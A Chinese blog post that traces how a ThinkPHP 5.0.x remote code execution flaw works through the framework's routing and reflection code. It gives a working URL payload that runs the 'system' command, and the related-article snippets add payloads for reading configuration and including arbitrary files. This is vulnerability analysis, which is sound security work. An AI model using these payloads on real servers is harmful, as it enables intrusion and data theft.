thinkphp5 未开启强制路由RCE

最新推荐文章于 2023-01-14 19:21:10 发布
最新推荐文章于 2023-01-14 19:21:10 发布
阅读量479 收藏
点赞数 1
分类专栏: thinkphp 文章标签: thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/119184994
版权

演示版本5.0.15
最终是利用反射调用函数执进行RCE
application/config.php下强制路由默认为false
在这里插入图片描述
从payload来看
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
运行框架,进入run方法,跟进到routeCheck
在这里插入图片描述

跟进path方法

public function path()
    {
        if (is_null($this->path)) {
            $suffix   = Config::get('url_html_suffix');
            $pathinfo = $this->pathinfo();
            if (false === $suffix) {
                // 禁止伪静态访问
                $this->path = $pathinfo;
            } elseif ($suffix) {
                // 去除正常的URL后缀
                $this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo);
            } else {
                // 允许任何后缀访问
                $this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo);
            }
        }
        return $this->path;
    }

默认$this->path为null,所以进入了 if 分支 最后$this->pathpathinfo()方法的返回值,跟进pathinfo

public function pathinfo()
    {
        if (is_null($this->pathinfo)) {
            if (isset($_GET[Config::get('var_pathinfo')])) {
                // 判断URL里面是否有兼容模式参数
                $_SERVER['PATH_INFO'] = $_GET[Config::get('var_pathinfo')];
                unset($_GET[Config::get('var_pathinfo')]);
            } elseif (IS_CLI) {
                // CLI模式下 index.php module/controller/action/params/...
                $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
            }

            // 分析PATHINFO信息
            if (!isset($_SERVER['PATH_INFO'])) {
                foreach (Config::get('pathinfo_fetch') as $type) {
                    if (!empty($_SERVER[$type])) {
                        $_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME'])) ?
                        substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type];
                        break;
                    }
                }
            }
            $this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/');
        }
        return $this->pathinfo;
    }

在这里插入图片描述
因为$this->pathinfo默认为null,所以进入下面判断是否有兼容模式参数,即我们get提交的s参数,将$_SERVER['PATH_INFO']赋值为s参数,即我们的/模块/控制器/方法
在这里插入图片描述
在这里插入图片描述

最后return了我们的路由,回到上面的path方法,最后return了
在这里插入图片描述
之后来到check方法

    public static function check($request, $url, $depr = '/', $checkDomain = false)
    {
        // 分隔符替换 确保路由定义使用统一的分隔符
        $url = str_replace($depr, '|', $url);

        if (isset(self::$rules['alias'][$url]) || isset(self::$rules['alias'][strstr($url, '|', true)])) {
            // 检测路由别名
            $result = self::checkRouteAlias($request, $url, $depr);
            if (false !== $result) {
                return $result;
            }
        }
        $method = strtolower($request->method());
        // 获取当前请求类型的路由规则
        $rules = isset(self::$rules[$method]) ? self::$rules[$method] : [];
        // 检测域名部署
        if ($checkDomain) {
            self::checkDomain($request, $rules, $method);
        }
        // 检测URL绑定
        $return = self::checkUrlBind($url, $rules, $depr);
        if (false !== $return) {
            return $return;
        }
        if ('|' != $url) {
            $url = rtrim($url, '|');
        }
        $item = str_replace('|', '/', $url);
        if (isset($rules[$item])) {
            // 静态路由规则检测
            $rule = $rules[$item];
            if (true === $rule) {
                $rule = self::getRouteExpress($item);
            }
            if (!empty($rule['route']) && self::checkOption($rule['option'], $request)) {
                self::setOption($rule['option']);
                return self::parseRule($item, $rule['route'], $url, $rule['option']);
            }
        }

        // 路由规则检测
        if (!empty($rules)) {
            return self::checkRoute($request, $rules, $url, $depr);
        }
        return false;
    }

第一行进行了分隔符替换
index/\think\app/invokefunction变成了index|\think\app|invokefunction,这里都没什么问题,来到强制路由检测
在这里插入图片描述
可以看到 如果$must为真 也就是开启了强制路由的话,则会报错 我们的路由就无效。现在默认为false,我们可以继续跟进
获得了$dispath的值
在这里插入图片描述

之后来到exec方法
在这里插入图片描述
跟进exec
在这里插入图片描述
前面知道$dispatch['type']module,跟进该方法,经过一些初始化操作后来到invokeMethod方法在这里插入图片描述
`

public static function invokeMethod($method, $vars = [])
    {
        if (is_array($method)) {
            $class   = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);
            $reflect = new \ReflectionMethod($class, $method[1]);
        } else {
            // 静态方法
            $reflect = new \ReflectionMethod($method);
        }

        $args = self::bindParams($reflect, $vars);

        self::$debug && Log::record('[ RUN ] ' . $reflect->class . '->' . $reflect->name . '[ ' . $reflect->getFileName() . ' ]', 'info');

        return $reflect->invokeArgs(isset($class) ? $class : null, $args);
    }

$method为数组,进入分支,生成反射实例,self::bindParams方法是为该实例绑定参数,也就是我们传入的参数
在这里插入图片描述
最后返回了一个数组在这里插入图片描述
在这里插入图片描述
最后进入invokefunction,继续绑定然后进行RCE,exec方法最后返回了执行结果
在这里插入图片描述

fmyyy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5.1在强制路由模式下url相关注意事项
gztrljh
04-27 334
假设我们定义一个路由 //登录页 Route::get('login', 'login/login'); 前面有/跳转 这样才是真正的强制路由模式 url('/login', [], false, true) 这样结果是 前面没有/跳转 就会变成 pathinfo模式 url('login', [], false, true) redirect方法也同理 return redirect('/login'); return redirect('login'); ...
Thinkphp 5.x 开启强制路由导致RCE分析
weixin_43263451的博客
03-31 2463
这种类型的漏洞是因为框架对于控制器名没有进行足够的校验,在没有开启强制路由的情况下,攻击者可以通过兼容模式调用任意的控制器的操作,从而达到远程命令执行。 1. 影响版本 5.0.7<=thinkphp<=5.0.22 5.1.x 2. 漏洞复现 环境: thinkphp5.0.20+php5.6.27+apache+phpstorm POC: ?s=index/\think\app/invokefunction&function=call_user_func_array&vars
ThinkPHP5.x开启强制路由(s参数)RCE
最新发布
weixin_43610673的博客
01-14 1089
官方公告:https://blog.thinkphp.cn/869075由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。
Thinkphp5开启强制路由导致的RCE 漏洞复现与分析
xiaolong22333的博客
09-28 910
影响版本 小于5.0.23 小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&
ThinkPHP5代码审计【开启强制路由导致RCE
D.MIND 的博客
05-13 1820
文章目录简介环境搭建分析payload修复 简介 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 环境搭建 以5.1.29作为演示: composer create-project --prefer-dist topthink/think=5.1
ThinkPHP5路由完全指南
09-26
ThinkPHP5路由完全指南》是一本专注于ThinkPHP5框架中路由系统的技术手册。路由是Web应用程序中的核心组件,它负责解析HTTP请求并将其映射到相应的处理逻辑上。ThinkPHP5作为国内广泛使用的PHP框架,其路由机制...
thinkphp5框架路由原理与用法详解
10-15
下面我们将深入探讨ThinkPHP5框架的路由原理和用法。 首先,路由的基本理解是将URL请求与应用程序内部处理逻辑地址进行映射。通过路由,我们可以隐藏实际的控制器和方法结构,提供更加简洁和可读的URL,同时提高...
thinkPHP5框架路由常用知识点汇总
10-16
主要介绍了thinkPHP5框架路由常用知识点,整理汇总了thinkPHP5框架路由相关概念、原理及操作技巧,需要的朋友可以参考下
ThinkPHP5.0应用强制路由、行为、统一返回值格式
aiqianb94352的博客
08-02 408
8、ThinkPHP5.0应用强制路由、行为、统一返回值格式 答:最近喜欢上了laravel的路由模式,发现tp5也有类似的操作。因此就动手做了一些改造,   1、强制路由模式   'url_route_on' =>true,   'url_route_must' =>true,   设置这两个参数便可实现tp强制路由路由定义方式如下例:   ...
ThinkphpV5 路由
大鹏
12-19 1万+
概述 由于ThinkPHP5.0默认采用的URL规则是: http://server/module/controller/action/param/value/... 路由解析的最终结果通常是把URL地址解析到模块的某个控制器下的操作方法,在特殊的情况下,也可以跳转到外部地址或者执行闭包函数。 新版的路由功能做了大量的增强,包括: 支持路由到模块(模块/控制器/操作)、控
ThinkPHP 路由使用
json_li的博客
12-29 619
最近在使用ThinkPHP6做项目的开发,故整理了一些常用的路由使用方式,可以方便之后的使用。在这里只是列举了一些常用的路由类型和参数设置,实际上还有很多,有兴趣的话可以了解一下。
ThinkPHP5.0.11Day02:路由模式(普通模式,强制模式)
坚持硬核
02-14 1229
目录 0x01 路由模式 1.普通模式: 2.强制模式: 3.路由分组: 4.闭包路由: 5.默认路由: 6.资源路由: 7.总结:
TP5混合模式没作用,必须强制定义路由,不然跳转首页
weixin_42326971的博客
01-23 1704
混合模式正常开启,但是如果不定义路由,访问path_info模式跳转首页 解决方案是修改入口文件同目录的.htaccess中的规则 默认是: 修改为:   完美解决!...
ThinkPHP5 RCE漏洞代码审计
qq_50589021的博客
10-12 955
前言 thinkphp下载 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 开启强制路由导致RCE 搭建 ThinkPHP 5.1框架结合RCE漏洞的深入分析 thinkphp-5.1.29 tp版本:5.1.29 php版本:7.2.10(必须7以上) 测试: http://www.yn8rt.com/thinkphp5.1.29/public/?s=index/think\request/input?data=
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
11-28 1144
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析 ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $username = request()->get('username\a'); db('users')-
openwrt软路由实现ipv6上网配置
热门推荐
奋斗人生路
05-22 3万+
1、介绍 面对目前互联网的高速发展IPv4地址已经枯竭为了解决此外问题国际互联网工程任务组(The Internet Engineering Task Force,简称 IETF)设计的用于替代IPv4的下一代IP协议即IPv6,目录已经有好多的网站、应用已经支持IPv6访问,IPv6也是来发展的方向,有必要提前了解和使用一下。 本文章讲解如何在开源软路由系统(openwrt)上实现IPv6上网,本人是使用的是 sirpdboy大神发布的openwrt x86版软路由系统,地址https://www.r
学习笔记-ThinkPHP5任意方法调用RCE
人饭子的博客
11-09 752
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
解决thinkphp5.1由于开启强制路由导致访问入口文件index.php失效的问题
yang1234567898的博客
05-08 1111
在route/router.php下添加以下代码 use think\facade\Route; Route::get('/', 'index/index/index'); 然后再访问http://localhost/tp5.1/public就不会再报路由定义的错误了
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 585
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
ThinkPHP5开发手册:路由、模型与数据库操作详解
"这是一份详细的ThinkPHP5(简称TP5)开发手册,涵盖了从安装、架构、配置、路由、控制器、请求、数据库操作、模型、视图到日志等全面的开发知识点,旨在帮助开发者深入理解和高效使用ThinkPHP5框架进行Web应用开发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值